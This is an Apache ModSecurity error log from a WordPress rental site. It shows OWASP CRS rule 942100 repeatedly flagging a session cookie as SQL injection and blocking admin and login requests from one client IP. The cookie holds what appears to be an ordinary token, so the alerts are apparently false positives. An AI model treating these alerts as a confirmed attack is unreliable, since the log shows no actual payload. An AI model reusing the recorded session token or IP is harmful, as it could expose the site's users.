[Mon May 11 18:32:09.600345 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEiTJnyuKVXoStDhbiMQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:09.600627 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEiTJnyuKVXoStDhbiMQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:10.204935 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEiTJnyuKVXoStDhbiMQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:10.437845 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEijJnyuKVXoStDhbiMgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:10.438146 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEijJnyuKVXoStDhbiMgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.001682 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEijJnyuKVXoStDhbiMgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.094117 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEizJnyuKVXoStDhbiMwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.094473 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEizJnyuKVXoStDhbiMwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.629794 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEizJnyuKVXoStDhbiMwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.742748 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEizJnyuKVXoStDhbiNQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:11.743022 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEizJnyuKVXoStDhbiNQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:12.121936 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEizJnyuKVXoStDhbiNQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:12.461949 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEjDJnyuKVXoStDhbiNgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:12.462276 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEjDJnyuKVXoStDhbiNgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:13.080302 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEjDJnyuKVXoStDhbiNgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:13.297378 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEjTJnyuKVXoStDhbiOAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:13.297657 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEjTJnyuKVXoStDhbiOAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:13.946918 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEjTJnyuKVXoStDhbiOAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:14.237422 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEjjJnyuKVXoStDhbiOgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:14.237709 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEjjJnyuKVXoStDhbiOgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:14.823690 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEjjJnyuKVXoStDhbiOgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:15.062584 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEjzJnyuKVXoStDhbiOwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:15.063029 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEjzJnyuKVXoStDhbiOwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:15.603278 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEjzJnyuKVXoStDhbiOwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:15.704007 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEjzJnyuKVXoStDhbiPAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:15.704302 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEjzJnyuKVXoStDhbiPAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:16.337787 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEjzJnyuKVXoStDhbiPAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:16.425832 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEkDJnyuKVXoStDhbiPgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:16.426124 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEkDJnyuKVXoStDhbiPgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:16.782766 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEkDJnyuKVXoStDhbiPgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:17.057142 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEkTJnyuKVXoStDhbiPwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:17.057451 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEkTJnyuKVXoStDhbiPwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:17.708182 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEkTJnyuKVXoStDhbiPwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:17.993560 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEkTJnyuKVXoStDhbiQQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:17.993850 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEkTJnyuKVXoStDhbiQQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:18.607219 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEkTJnyuKVXoStDhbiQQAAAFM"], referer: https://rentparadise.fr/wp-login.php
